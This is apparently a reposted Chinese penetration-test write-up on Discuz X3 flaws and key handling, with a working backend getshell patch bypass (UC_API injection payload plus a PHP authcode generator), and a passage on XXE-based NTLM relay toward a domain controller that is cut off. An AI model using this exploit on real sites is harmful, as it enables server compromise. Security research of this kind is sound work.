3atv精品不卡视频,97人人超碰国产精品最新,中文字幕av一区二区三区人妻少妇,久久久精品波多野结衣,日韩一区二区三区精品

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

“不一样”的真实渗透测试案例分析

發(fā)布時(shí)間:2025/3/21 编程问答 21 豆豆
生活随笔 收集整理的這篇文章主要介紹了 “不一样”的真实渗透测试案例分析 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

前言

本文是由一次真實(shí)的授權(quán)滲透案例引申而出的技術(shù)分析和總結(jié)文章。在文章中我們會(huì)首先簡(jiǎn)單介紹這次案例的整體滲透流程并進(jìn)行部分演繹,但不會(huì)進(jìn)行詳細(xì)的截圖和描述,一是怕“有心人”發(fā)現(xiàn)端倪去目標(biāo)復(fù)現(xiàn)漏洞和破壞,二是作為一線攻擊人員,大家都明白滲透過程也是一個(gè)試錯(cuò)過程,針對(duì)某一個(gè)點(diǎn)我們可能嘗試了無數(shù)種方法,最后寫入文章的只有成功的一種,而這種方法很有可能也是眾所周知的方法。因此我們只會(huì)簡(jiǎn)單介紹滲透流程,然后提取整個(gè)滲透過程中比較精華的點(diǎn),以點(diǎn)及面來進(jìn)行技術(shù)分析和探討,望不同的人有不同的收獲。
白嫖的福音網(wǎng)安學(xué)習(xí)資料》》

滲透流程簡(jiǎn)述

在接到項(xiàng)目以后,由“前端”小組(初步技術(shù)分析小組)進(jìn)行項(xiàng)目分析和信息收集以及整理,整理出了一批域名和一些關(guān)鍵站點(diǎn),其中有一個(gè)phpmyadmin 和 discuz的組合建站,且均暴露在外網(wǎng),這也是很常見的一種情況。由于網(wǎng)站某個(gè)web端口的解析配置問題導(dǎo)致了php不被解析而形成任意文件下載漏洞,通過這個(gè)漏洞我們拿到了mysql的root賬戶密碼。由于linux服務(wù)器權(quán)限設(shè)置比較嚴(yán)格的問題沒法直接使用phpmyadmin登錄mysql而提權(quán)拿到discuz的webshell。經(jīng)過多種嘗試我們利用phpmyadmin替換管理員hash而登錄discuz后臺(tái),在discuz后臺(tái)利用修改ucenter配置文件的漏洞寫入了webshell。

在進(jìn)入內(nèi)網(wǎng)以后,通過簡(jiǎn)單的80、443探測(cè)內(nèi)網(wǎng)的web時(shí)候發(fā)現(xiàn)了一個(gè)含有java webdav的服務(wù)(域內(nèi)windows,后文中以A服務(wù)器稱呼),利用java webdav的xxe去執(zhí)行NTLM Relay。同時(shí)收集discuz數(shù)據(jù)庫(kù)中用戶名利用kerberos AS_REQ和密碼噴射(一個(gè)密碼和不同用戶名的組合去KDC枚舉)幸運(yùn)的獲得了一組域內(nèi)用戶的賬戶和密碼,利用這個(gè)用戶增加了一個(gè)機(jī)器賬戶。結(jié)合NTLM Relay和這個(gè)機(jī)器賬戶利用基于資源的約束委派,成功的使這個(gè)機(jī)器賬戶具有了控制A服務(wù)器的權(quán)限。登錄A服務(wù)器繞過卡巴斯基抓取到了域管理密碼,這次攻堅(jiān)任務(wù)也因此而結(jié)束。圖示如下:

在這次滲透流程中我們認(rèn)為Discuz x3系列和xxe到域控這兩個(gè)點(diǎn)是值得拿出來分析和探討的。白嫖的福音網(wǎng)安學(xué)習(xí)資料》》

Discuz X3系列

本節(jié)分為3部分,首先將對(duì)Discuz X3以后的版本出現(xiàn)的主要漏洞做一個(gè)簡(jiǎn)單總結(jié),然后針對(duì)discuz的幾種密鑰做一些分析,最后發(fā)布一個(gè)discuz最新的后臺(tái)getshell。

以后漏洞總結(jié)

目前市面上基本都是x3以上的Discuz程序了,x3以下的網(wǎng)站占比已經(jīng)非常低了,因此在此只總結(jié)x3以上的漏洞。總結(jié)并不是對(duì)每個(gè)漏洞進(jìn)行重新分析,這是沒有必要的,網(wǎng)上已經(jīng)有很多優(yōu)秀的分析文章了。那我們?yōu)槭裁催€要總結(jié)呢?如果你是在一線做滲透測(cè)試或者紅隊(duì)評(píng)估的同學(xué),應(yīng)該會(huì)經(jīng)常遇到discuz,往往大部分同學(xué)一看程序版本再搜搜漏洞或者群里問問就放棄了。在大家的印象中discuz是一塊硬骨頭,沒必要耗太多時(shí)間在它身上,但事實(shí)上discuz并不是你所想象的那么安全。本小節(jié)將通過總結(jié)discuz的各種小漏洞,再結(jié)合我們自己的幾次對(duì)discuz目標(biāo)的突破,提出一些利用思路和利用可能。

類型適用版本適用條件利用分析分析文章
SSRF<= x3.4 修復(fù)補(bǔ)丁1.windows
2.php>5.3+php-curl<=7.54
3.DZ開放在80端口
SSRF的利用主要是攻擊其他服務(wù),大部分情況都需要利用到gopher協(xié)議
在DZ中需要利用緩存(redis,memcache)getshell,當(dāng)然gopher模擬的tcp協(xié)議,如果服務(wù)器或內(nèi)網(wǎng)中存在其他的可利用服務(wù)也是可以精心構(gòu)造數(shù)據(jù)表利用的。
1.Discuz x3.4前臺(tái)SSRF分析
2.DiscuzX 兩處 SSRF 挖掘及利用
3.Discuz!因Memcached未授權(quán)訪問導(dǎo)致的RCE
任意文件刪除<= x3.4
修復(fù)補(bǔ)丁
前臺(tái)用戶權(quán)限Discuz 在安裝成功后,登陸后臺(tái)就會(huì)刪除安裝文件,所以重裝利用是不能實(shí)現(xiàn)的。
現(xiàn)實(shí)中的主要利用集中于刪除index.htm文件,再利用目錄遍歷去獲取備份文件,通過備份文件中的各種敏感信息(各種KEY,hash),然后再進(jìn)一步利用。
Discuz!X ≤3.4 任意文件刪除漏洞分析
短文件名 漏洞未修復(fù)windows看似是比較雞肋的小技巧,但在猜一些隨機(jī)命令的文件名時(shí)非常有用,比如:利用短文件名我們可以下載數(shù)據(jù)庫(kù)備份文件(文件名中含有隨機(jī)字符),利用備份文件我們可以嘗試解密用戶密碼。https://gitee.com/ComsenzDiscuz/DiscuzX/issues/I10NG9
authkey 預(yù)測(cè)<x 3.4問題的本質(zhì)在于mt_rand() 在同一個(gè)進(jìn)程中共享隨機(jī)數(shù)種子。利用猜解的authkey我們可以破解discuz主題功能的加密校驗(yàn)過程Discuz_X authkey安全性漏洞分析
后臺(tái)sql注入<=3.4
修復(fù)補(bǔ)丁
后臺(tái)權(quán)限discuz后臺(tái)已經(jīng)具備數(shù)據(jù)庫(kù)備份功能,所以select 注入作用將減小很多,該漏洞的最大意義在于mysql較低版本的寫文件getshell(這里向discuz備份目錄寫也不行,因?yàn)閐iscuz的mkdir設(shè)置的0777,但是受到umask的影響,實(shí)際寫入的是0755,所以寫文件也比較困難),但由于x3后臺(tái)沒有了直接執(zhí)行sql的功能,如果有一個(gè)注入,我們可以夸庫(kù)查詢,搞定同mysql的其他網(wǎng)站。Discuz! X系列全版本后臺(tái)Sql注入漏洞
后臺(tái)注入漏洞<=3.4
修復(fù)補(bǔ)丁
后臺(tái)權(quán)限由于是update型注入,我們?cè)诤笈_(tái)已經(jīng)可以利用數(shù)據(jù)庫(kù)備份獲得數(shù)據(jù),對(duì)本網(wǎng)站意義不大,但是有同mysql的其他網(wǎng)站,如果權(quán)限不嚴(yán),夸庫(kù)查詢,搞定同mysql的其他網(wǎng)站。SQL注入
后臺(tái)設(shè)置mysql任意文件讀取<=3.4
修復(fù)補(bǔ)丁
后臺(tái)權(quán)限通過文件讀取后,我們可以結(jié)合uc_key、authkey等key的利用。Mysql任意文件讀取攻擊鏈拓展
后臺(tái)命令執(zhí)行1.5-2.5
修復(fù)補(bǔ)丁
后臺(tái)權(quán)限這個(gè)漏洞是命令注入漏洞,但是由于開發(fā)者的失誤,導(dǎo)致3.x不可用。漏洞本身也是在x3.4才被修復(fù)CVE-2018-14729
Memcached未授權(quán)訪問導(dǎo)致的RCE<=3.4memcached 權(quán)限需要memcached的修改權(quán)限,這個(gè)權(quán)限可以來自于ssrf,也可以來自于未授權(quán)Discuz!因Memcached未授權(quán)訪問導(dǎo)致的RCE
Discuz! X3.1后臺(tái)任意代碼執(zhí)行<=x3.1后臺(tái)權(quán)限x3.1中間版本的getshell方法,用作參考Discuz! X3.1后臺(tái)任意代碼執(zhí)行
后臺(tái)uc_center代碼執(zhí)行< 3.4
修復(fù)補(bǔ)丁
后臺(tái)權(quán)限利用分析請(qǐng)看下面的文章內(nèi)容本文分析

總結(jié):

針對(duì)于discuz的ssrf漏洞,在補(bǔ)丁 中限制了對(duì)內(nèi)網(wǎng)ip的訪問,導(dǎo)致了很難被利用。
在后臺(tái)getshell中,建議使用uc_center rce比較方便,并且通殺包括最新版本,后文有分析。
UC_KEY 直接getshell已在x3以上的最新版本被修復(fù),但在一些老的3.2以前的版本可能被利用。
以上這些漏洞應(yīng)該并不全面,且看似都比較雞肋,但往往千里之堤毀于蟻穴,幾個(gè)不起眼的小漏洞組合一下會(huì)發(fā)現(xiàn)威力巨大。仔細(xì)的讀者應(yīng)該發(fā)現(xiàn)以上漏洞大部分能夠造成的最大危害是信息泄露,信息泄露有什么用呢?下面我們將接著分析Discuz的幾種密鑰,看到這兒你應(yīng)該已經(jīng)明白了,通過信息泄露,獲得相關(guān)密鑰,突破discuz的加密體系,進(jìn)而獲取更高的權(quán)限。

Discuz的幾種密鑰分析

通過分析,在discuz中,主要有下面的幾種密鑰, 這些密鑰共同構(gòu)成了discuz的加密解密體系,這里的命名有重復(fù),我已經(jīng)標(biāo)記了對(duì)應(yīng)key值以及key所在的位置。如下表所示:

主要探討的其實(shí)就只有authkey,UC_KEY(dz),UC_KEY(uc_server),UC_MYKEY,authkey(uc_server) 5種,我們首先來看著幾個(gè)密鑰是怎么來的最后又到了哪兒去。

密鑰的產(chǎn)生

authkey,UC_KEY(dz),UC_KEY(uc_server),UC_MYKEY 都是在安裝的時(shí)候產(chǎn)生。authkey(uc_server)的產(chǎn)生是和UC_MYKEY息息相關(guān)的,在后文中詳細(xì)講述。生成代碼如下所示:

//https://gitee.com/ComsenzDiscuz/DiscuzX/blob/v3.4-20191201/upload/install/index.php <?php ...$uid = DZUCFULL ? 1 : $adminuser['uid'];$authkey = md5($_SERVER['SERVER_ADDR'].$_SERVER['HTTP_USER_AGENT'].$dbhost.$dbuser.$dbpw.$dbname.$username.$password.$pconnect.substr($timestamp, 0, 8)).random(18);$_config['db'][1]['dbhost'] = $dbhost;$_config['db'][1]['dbname'] = $dbname;$_config['db'][1]['dbpw'] = $dbpw;$_config['db'][1]['dbuser'] = $dbuser;$_config['db'][1]['tablepre'] = $tablepre;$_config['admincp']['founder'] = (string)$uid;$_config['security']['authkey'] = $authkey;$_config['cookie']['cookiepre'] = random(4).'_';$_config['memory']['prefix'] = random(6).'_';save_config_file(ROOT_PATH.CONFIG, $_config, $default_config);$db = new dbstuff;$db->connect($dbhost, $dbuser, $dbpw, $dbname, DBCHARSET);if(!VIEW_OFF) {show_header();show_install();}if(DZUCFULL) {install_uc_server();} ...$db->query("REPLACE INTO {$tablepre}common_setting (skey, svalue) VALUES ('authkey', '$authkey')"); ... ?>

我們看見key的產(chǎn)生都依賴于discuz 自定義的random函數(shù),出現(xiàn)過的authkey爆破問題也因此產(chǎn)生。在安裝時(shí)由于處于同一個(gè)cgi進(jìn)程,導(dǎo)致mt_rand() 只播種了一次種子,所以產(chǎn)生了隨機(jī)數(shù)種子爆破和推測(cè)key的問題,在3.4版本中,authkey的產(chǎn)生已經(jīng)是拼接了完整的32位字符串,導(dǎo)致了無法進(jìn)行爆破推算出authkey的前半部,因此這個(gè)問題已經(jīng)被修復(fù),但這個(gè)漏洞原理值得學(xué)習(xí)。代碼最后可以看出authkey產(chǎn)生后還放入了數(shù)據(jù)庫(kù)中,最終authkey存在于數(shù)據(jù)庫(kù)pre_common_setting表和/config/config_global.php配置文件。 代碼中的 instal_uc_server()函數(shù)實(shí)現(xiàn)了UC_KEY(dz),UC_KEY(uc_server)的產(chǎn)生,使用了同一個(gè)生成函數(shù)_generate_key(),代碼如下:

function _generate_key() {$random = random(32);$info = md5($_SERVER['SERVER_SOFTWARE'].$_SERVER['SERVER_NAME'].$_SERVER['SERVER_ADDR'].$_SERVER['SERVER_PORT'].$_SERVER['HTTP_USER_AGENT'].time());$return = array();for($i=0; $i<32; $i++) {$return[$i] = $random[$i].$info[$i];}return implode('', $return); }

產(chǎn)生的算法牽扯到安裝環(huán)境和安裝過程的http header信息,導(dǎo)致爆破基本失效,從而無法預(yù)測(cè),最后UC_KEY(dz)保存到了/config/config_ucenter.php中,UC_KEY(uc_server)保存到了/uc_server/data/config.inc.php中。

Discuz Key的相關(guān)思考

我們通過查看源碼,去分析每個(gè)key影響的功能,通過這些功能點(diǎn),我們可以去獲得更多的信息。信息的整合和利用往往是我們滲透的關(guān)鍵。下面我們將做一些拋磚引玉的思考并舉一些例子,但不會(huì)面面俱到一一分析,這樣也沒有意義,具體的代碼還是需要讀者自己親自去讀才能印象深刻。白嫖的福音網(wǎng)安學(xué)習(xí)資料》》

1. authkey
authkey的使用在discuz主程序中占比很重,主要用戶數(shù)據(jù)的加密存儲(chǔ)和解密使用,比如alipay相關(guān)支付數(shù)據(jù)的存儲(chǔ)和使用、FTP密碼的存儲(chǔ)等等;還用于一些功能的校驗(yàn),比如驗(yàn)證碼的校驗(yàn)、上傳hash的校驗(yàn)等等;用戶權(quán)限的校驗(yàn)也用到了authkey,比如source/class/discuz/discuz_application.php 中_init_user() 利用authkey解碼了cookie中的auth字段,并利用解開的uid和pw進(jìn)行權(quán)限校驗(yàn),但是光知道authkey并不能完成權(quán)限校驗(yàn),我們還需要知道用戶的”密碼hash“(數(shù)據(jù)庫(kù)pre_common_member表中的password字段,此處存儲(chǔ)的只是一個(gè)隨機(jī)值的md5,真正的用戶密碼hash在pre_ucenter_members中),當(dāng)我們通過其他方法可以讀取數(shù)據(jù)庫(kù)數(shù)據(jù)時(shí),我們就可以偽造登陸信息進(jìn)行登陸,再比如source/include/misc/misc_emailcheck.php中authkey的參與了校驗(yàn)hash的生成,當(dāng)我們知道了authkey后,通過偽造hash,我們可以修改用戶的注冊(cè)郵箱,然后利用密碼找回來登陸前臺(tái)用戶(管理員不能使用密碼找回功能)。

2. UC_KEY(dz)
UC_KEY(dz)也是經(jīng)常提到的UC_KEY GetWebShell的主角。它主要在2個(gè)地方被使用:一個(gè)是數(shù)據(jù)庫(kù)備份api/db/dbbak.php;一個(gè)是針對(duì)用戶以及登錄和緩存文件相關(guān)的操作,主要函數(shù)位于api/uc.php中的uc_note類。

關(guān)于UC_KEY(dz)的利用,網(wǎng)上基本都是通過uc.php來GetWebShell,但這個(gè)漏洞在新版本已經(jīng)被修復(fù)了。UC_KEY(dz)的利用并不局限與此,你去閱讀dbbak.php代碼就會(huì)發(fā)現(xiàn),有了UC_KEY(dz)我們可以直接備份數(shù)據(jù)庫(kù),下載數(shù)據(jù)庫(kù),從數(shù)據(jù)庫(kù)中找到相關(guān)信息進(jìn)行進(jìn)一步滲透。

另外一個(gè)地方就是uc_note類,比如里面的synlogin()函數(shù)可以偽造登陸任意前臺(tái)用戶。當(dāng)然還有其他的函數(shù),在這里就不一一分析。

3. UC_KEY(uc_server)
UC_KEY(uc_server)往往是被大家忽視的一個(gè)key,它其實(shí)比UC_KEY(dz)的使用更多。首先他同樣可以備份數(shù)據(jù)庫(kù),對(duì)discuz代碼比較熟悉的同學(xué)應(yīng)該知道dbbak.php這個(gè)文件有2個(gè),一個(gè)是上面提到的api/db/dbbak.php;另外一個(gè)是uc_server/api/dbbak.php,他們的代碼可以說幾乎相同。唯一的區(qū)別是api/db/dbbak.php中多了2個(gè)常量的定義,基本沒有太大影響。這個(gè)2個(gè)文件都能被UC_KEY(dz)和UC_KEY(uc_server)操控。

UC_KEY(uc_server)幾乎管控了Ucenter的所有和權(quán)限認(rèn)證相關(guān)的功能。例如權(quán)限驗(yàn)證函數(shù) sid_decode() ,在該函數(shù)中UC_KEY(uc_server)和用戶可控的http header共同產(chǎn)生了用于權(quán)限認(rèn)證的sid,因此我們可以偽造sid繞過一些權(quán)限檢測(cè)。還有seccode的相關(guān)利用,在這里就不一一介紹。

整個(gè)discuz的程序其實(shí)是包含了discuz主程序和Ucenter,Ucenter更依賴于固定密鑰體系,個(gè)人感覺Ucenter的漏洞可能要比discuz主程序好挖些,你可以去試試。

4. UC_MYKEY
UC_MYKEY主要用來加密和解密UC_KEY(discuz),如下所示:

UC_KEY(dz) ----- authcode(UC_MYKEY, ENCODE) ----> authkey(uc_server)authkey(uc_server) ----- authcode(UC_MYKEY, DECODE) ----> UC_KEY(dz)

authkey(uc_server)存儲(chǔ)在數(shù)據(jù)庫(kù)的pre_ucenter_applications中的authkey字段,authkey(uc_server)生成的代碼如下:

//https://gitee.com/ComsenzDiscuz/DiscuzX/blob/v3.4-20191201/upload/uc_server/control/admin/app.php <?php ...$authkey = getgpc('authkey', 'P');$authkey = $this->authcode($authkey, 'ENCODE', UC_MYKEY);$synlogin = getgpc('synlogin', 'P'); ...$app = $this->db->result_first("SELECT COUNT(*) FROM ".UC_DBTABLEPRE."applications WHERE name='$name'");if($app) {$this->message('app_add_name_invalid', 'BACK');} else {$extra = serialize(array('apppath'=> getgpc('apppath', 'P')));$this->db->query("INSERT INTO ".UC_DBTABLEPRE."applications SET name='$name', url='$url', ip='$ip',viewprourl='$viewprourl', apifilename='$apifilename', authkey='$authkey', synlogin='$synlogin',type='$type', recvnote='$recvnote', extra='$extra',tagtemplates='$tagtemplates'");$appid = $this->db->insert_id();} ... ?>

現(xiàn)在我們就可以知道其實(shí)UC_KEY(dz)是可以從2個(gè)地方獲取到的,一個(gè)是配置文件,一個(gè)是數(shù)據(jù)庫(kù)。對(duì)discuz比較熟悉的同學(xué)這里會(huì)發(fā)現(xiàn)一個(gè)問題,通過注入獲得的authkey (uc_server),有時(shí)候可以直接當(dāng)UC_KEY(dz)用,但有時(shí)候發(fā)現(xiàn)是一個(gè)大于64位的字符串或小于64位的字符串。這個(gè)是因?yàn)?#xff0c;如果你是默認(rèn)discuz主程序和Ucenter安裝,這個(gè)時(shí)候數(shù)據(jù)庫(kù)pre_ucenter_applications中的authkey字段存儲(chǔ)的就是UC_KEY(dz),如果你通過ucenter后臺(tái)修改過UC_KEY(dz),數(shù)據(jù)庫(kù)pre_ucenter_applications中的authkey字段存儲(chǔ)的就是通過上面提到的算法計(jì)算出來的結(jié)果了,這個(gè)結(jié)果的長(zhǎng)度是變化的,是一個(gè)大于等于40位的字符串。

總結(jié)

針對(duì)于getshell來說,在x3以前的低版本和部分未更新的x3.2以前版本,我們可以直接利用discuz的uc_key(dz)結(jié)合api/uc.php前臺(tái)getshell,獲得uc_key(dz)的方法有:

數(shù)據(jù)庫(kù)中的authkey(uc_server)結(jié)合UC_MYKEY,這個(gè)在UCenter后臺(tái)也能看見,沒有使用*顯示。
文件泄露等問題獲得uc_key(dz)
在x3版本以后,對(duì)于key的利用主要集中在操作數(shù)據(jù)庫(kù)和UCenter功能上,利用各種辦法進(jìn)入discuz后臺(tái),結(jié)合接下來講到的后臺(tái)GetWebShell的方法獲取最終權(quán)限。

后臺(tái)GetWebShell的補(bǔ)丁繞過

在小于x3.4的版本中,網(wǎng)上已經(jīng)公布的利用方法是:后臺(tái)修改Ucenter數(shù)據(jù)庫(kù)連接信息,由于寫入未轉(zhuǎn)義,一句話木馬直接寫入config/config_ucenter.php文件中,導(dǎo)致代碼執(zhí)行。

但是在新版本的x3.4中已經(jīng)修復(fù)了這個(gè)漏洞,代碼如下:

// https://gitee.com/ComsenzDiscuz/DiscuzX/blob/v3.4-20191201/upload/source/admincp/admincp_setting.php x3.4 <?php ...if($operation == 'uc' && is_writeable('./config/config_ucenter.php') && $isfounder) {require_once './config/config_ucenter.php';$ucdbpassnew = $settingnew['uc']['dbpass'] == '********' ? addslashes(UC_DBPW) : addslashes($settingnew['uc']['dbpass']);$settingnew['uc']['key'] = addslashes($settingnew['uc']['key'] == '********' ? addslashes(UC_KEY) : $settingnew['uc']['key']);if(function_exists("mysql_connect") && ini_get("mysql.allow_local_infile")=="1" && constant("UC_DBHOST") != $settingnew['uc']['dbhost']){cpmsg('uc_config_load_data_local_infile_error', '', 'error');}if($settingnew['uc']['connect']) {$uc_dblink = function_exists("mysql_connect") ? @mysql_connect($settingnew['uc']['dbhost'], $settingnew['uc']['dbuser'], $ucdbpassnew, 1) : new mysqli($settingnew['uc']['dbhost'], $settingnew['uc']['dbuser'], $ucdbpassnew);if(!$uc_dblink) {cpmsg('uc_database_connect_error', '', 'error');} else {if(function_exists("mysql_connect")) {mysql_close($uc_dblink);} else {$uc_dblink->close();}}}$fp = fopen('./config/config_ucenter.php', 'r');$configfile = fread($fp, filesize('./config/config_ucenter.php'));$configfile = trim($configfile);$configfile = substr($configfile, -2) == '?>' ? substr($configfile, 0, -2) : $configfile;fclose($fp);$connect = '';$settingnew['uc'] = daddslashes($settingnew['uc']);if($settingnew['uc']['connect']) {$connect = 'mysql';$samelink = ($dbhost == $settingnew['uc']['dbhost'] && $dbuser == $settingnew['uc']['dbuser'] && $dbpw == $ucdbpassnew);$samecharset = !($dbcharset == 'gbk' && UC_DBCHARSET == 'latin1' || $dbcharset == 'latin1' && UC_DBCHARSET == 'gbk');$configfile = str_replace("define('UC_DBHOST', '".addslashes(UC_DBHOST)."')", "define('UC_DBHOST', '".$settingnew['uc']['dbhost']."')", $configfile);$configfile = str_replace("define('UC_DBUSER', '".addslashes(UC_DBUSER)."')", "define('UC_DBUSER', '".$settingnew['uc']['dbuser']."')", $configfile);$configfile = str_replace("define('UC_DBPW', '".addslashes(UC_DBPW)."')", "define('UC_DBPW', '".$ucdbpassnew."')", $configfile); ... ?>

補(bǔ)丁對(duì) $ucdbpassnew 進(jìn)行了轉(zhuǎn)義,而且if(function_exists(“mysql_connect”) && ini_get(“mysql.allow_local_infile”)==“1” && constant(“UC_DBHOST”) != $settingnew[‘uc’][‘dbhost’]), 該補(bǔ)丁還解決了惡意mysql文件讀取的問題。

繞過補(bǔ)丁

通過補(bǔ)丁,我們知道了所有的Ucenter配置參數(shù)都會(huì)進(jìn)行轉(zhuǎn)義,但是我發(fā)現(xiàn)discuz的配置文件更改,都是利用字符替換完成的,在替換字符中,很容易出現(xiàn)問題,所以在源碼中尋找配置修改的相關(guān)代碼,最后在 api/uc.php 中找到了利用點(diǎn)。

//https://gitee.com/ComsenzDiscuz/DiscuzX/blob/v3.4-20191201/upload/api/uc.php <?php... if(!defined('IN_UC')) {require_once '../source/class/class_core.php';$discuz = C::app();$discuz->init();require DISCUZ_ROOT.'./config/config_ucenter.php';$get = $post = array();$code = @$_GET['code'];parse_str(authcode($code, 'DECODE', UC_KEY), $get);if(time() - $get['time'] > 3600) {exit('Authracation has expiried');}if(empty($get)) {exit('Invalid Request');}include_once DISCUZ_ROOT.'./uc_client/lib/xml.class.php';$post = xml_unserialize(file_get_contents('php://input'));if(in_array($get['action'], array('test', 'deleteuser', 'renameuser', 'gettag', 'synlogin', 'synlogout', 'updatepw', 'updatebadwords', 'updatehosts', 'updateapps', 'updateclient', 'updatecredit', 'getcredit', 'getcreditsettings', 'updatecreditsettings', 'addfeed'))) {$uc_note = new uc_note();echo call_user_func(array($uc_note, $get['action']), $get, $post);exit();} else {exit(API_RETURN_FAILED);} } else {exit; } ...function updateapps($get, $post) {global $_G;if(!API_UPDATEAPPS) {return API_RETURN_FORBIDDEN;}$UC_API = '';if($post['UC_API']) {$UC_API = str_replace(array('\'', '"', '\\', "\0", "\n", "\r"), '', $post['UC_API']);unset($post['UC_API']);}$cachefile = DISCUZ_ROOT.'./uc_client/data/cache/apps.php';$fp = fopen($cachefile, 'w');$s = "<?php\r\n";$s .= '$_CACHE[\'apps\'] = '.var_export($post, TRUE).";\r\n";fwrite($fp, $s);fclose($fp);if($UC_API && is_writeable(DISCUZ_ROOT.'./config/config_ucenter.php')) {if(preg_match('/^https?:\/\//is', $UC_API)) {$configfile = trim(file_get_contents(DISCUZ_ROOT.'./config/config_ucenter.php'));$configfile = substr($configfile, -2) == '?>' ? substr($configfile, 0, -2) : $configfile;$configfile = preg_replace("/define\('UC_API',\s*'.*?'\);/i", "define('UC_API', '".addslashes($UC_API)."');", $configfile);if($fp = @fopen(DISCUZ_ROOT.'./config/config_ucenter.php', 'w')) {@fwrite($fp, trim($configfile));@fclose($fp);}}}return API_RETURN_SUCCEED;} ... ?>

在 updateapps 函數(shù)中完成了對(duì) uc_api 的更新,這里的正則在匹配時(shí)是非貪婪的,這里就會(huì)存在一個(gè)問題,當(dāng)uc_api為 define(‘UC_API’, ‘http://127.0.0.1/discuz34/uc_server’);phpinfo();//’); 時(shí),我們執(zhí)行updateapps函數(shù)來更新uc_api時(shí)就會(huì)將phpinfo();釋放出來。 要使用updateapps進(jìn)行來更新uc_api,我們需要知道UC_KEY(dz)的值,而UC_KEY(dz)的值,恰好是我們后臺(tái)可以設(shè)置的。

利用分析

進(jìn)入后臺(tái)站長(zhǎng)-Ucenter設(shè)置,設(shè)置UC_KEY=隨意(一定要記住,后面要用), UC_API= http://127.0.0.1/discuz34/uc_server’);phpinfo();//

成功寫進(jìn)配置文件,這里單引號(hào)被轉(zhuǎn)移了,我們接下來使用UC_KEY(dz)去調(diào)用api/uc.php中的updateapps函數(shù)更新UC_API。

利用UC_KEY(dz) 生成code參數(shù),使用過UC_KEY(dz) GetWebShell的同學(xué)肯定不陌生,這里使用的UC_KEY(dz)就是上面我們?cè)O(shè)置的。

<?php $uc_key="123456";// $time = time() + 720000; $str = "time=".$time."&action=updateapps"; $code = authcode($str,"ENCODE",$uc_key); $code = str_replace('+','%2b',$code); $code = str_replace('/','%2f',$code); echo $code;function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {$ckey_length = 4;$key = md5($key != '' ? $key : '123456');$keya = md5(substr($key, 0, 16));$keyb = md5(substr($key, 16, 16));$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';$cryptkey = $keya.md5($keya.$keyc);$key_length = strlen($cryptkey);$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;$string_length = strlen($string);$result = '';$box = range(0, 255);$rndkey = array();for($i = 0; $i <= 255; $i++) {$rndkey[$i] = ord($cryptkey[$i % $key_length]);}for($j = $i = 0; $i < 256; $i++) {$j = ($j + $box[$i] + $rndkey[$i]) % 256;$tmp = $box[$i];$box[$i] = $box[$j];$box[$j] = $tmp;}for($a = $j = $i = 0; $i < $string_length; $i++) {$a = ($a + 1) % 256;$j = ($j + $box[$a]) % 256;$tmp = $box[$a];$box[$a] = $box[$j];$box[$j] = $tmp;$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));}if($operation == 'DECODE') {if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {return substr($result, 26);} else {return '';}} else {return $keyc.str_replace('=', '', base64_encode($result));} } ?>

將生成的數(shù)據(jù)帶入GET請(qǐng)求中的code 參數(shù),發(fā)送數(shù)據(jù)包

訪問 http://127.0.0.1/discuz34/config/config_ucenter.php 代碼執(zhí)行成功

到此成功GetWebShell,在這個(gè)過程中,有一點(diǎn)需要注意的是,我們修改了程序原有的UC_KEY(dz),成功GetWebShell以后一定要修復(fù),有2中方法:

從數(shù)據(jù)庫(kù)中讀取authkey(uc_server),通過UC_MYKEY解密獲得UC_KEY(dz),當(dāng)然有可能authkey(uc_server)就是UC_KEY(dz)。
直接進(jìn)入U(xiǎn)center后臺(tái)修改UC_KEY,修改成我們GetWebShell過程中所設(shè)置的值。
白嫖的福音網(wǎng)安學(xué)習(xí)資料》》

XXE to 域控

在本節(jié)中我們會(huì)講到WEBDAV XXE(JAVA)利用NTLM Relay和一個(gè)機(jī)器賬戶去設(shè)置基于資源的約束委派來RCE的故事。當(dāng)然繞過卡巴斯基dump lsass也是非常的精彩。流程圖示如下:

WEBDAV XXE

前文中已經(jīng)提到了我們進(jìn)入內(nèi)網(wǎng)后發(fā)現(xiàn)一臺(tái)部署著java應(yīng)用的web服務(wù)器,并探測(cè)出該網(wǎng)站存在/webdav目錄。

在一個(gè)國(guó)外安全研究員的ppt(What should a hacker know about WebDav? )中這樣提到: 一般webdav支持多種http方法,而PROPPATCH、PROPFIND、 LOCK等方法接受XML作為輸入時(shí)會(huì)形成xxe。

我們探測(cè)下支持的http方法:

我們?cè)跍y(cè)試PROPFIND方法時(shí)成功收到了xxe請(qǐng)求:

常規(guī)的xxe一般會(huì)想到任意文件讀取、以及網(wǎng)上提到的利用gopher打redis等。在《Ghidra 從 XXE 到 RCE》中提到利用java xxe做ntlm relay操作。由于sun.net.www.protocol.http.HttpURLConnection 發(fā)送HTTP請(qǐng)求遇到狀態(tài)碼為401的HTTP返回頭時(shí),會(huì)判斷該頁(yè)面要求使用哪種認(rèn)證方式,若攻擊者回復(fù)要求采用NTLM認(rèn)證則會(huì)自動(dòng)使用當(dāng)前用戶憑據(jù)進(jìn)行認(rèn)證。

現(xiàn)在我們成功獲取到了NTLM認(rèn)證請(qǐng)求,接下來就是NTLM中繼了。

NTLM中繼和域機(jī)器賬戶添加

什么是NTLM中繼
相信大家都不陌生,要理解什么是NTLM中繼首先要知道NTLM認(rèn)證的大致流程,這里做個(gè)簡(jiǎn)單講述,詳細(xì)請(qǐng)參考The NTLM Authentication Protocol and Security Support Provider。

NTLM身份驗(yàn)證協(xié)議中包含3個(gè)步驟:

協(xié)商:NTLM身份驗(yàn)證的第一步是協(xié)議的協(xié)商,以及客戶端支持哪些功能。在此階段,客戶端將身份驗(yàn)證請(qǐng)求發(fā)送到服務(wù)器,其中包括客戶端接受的NTLM版本。
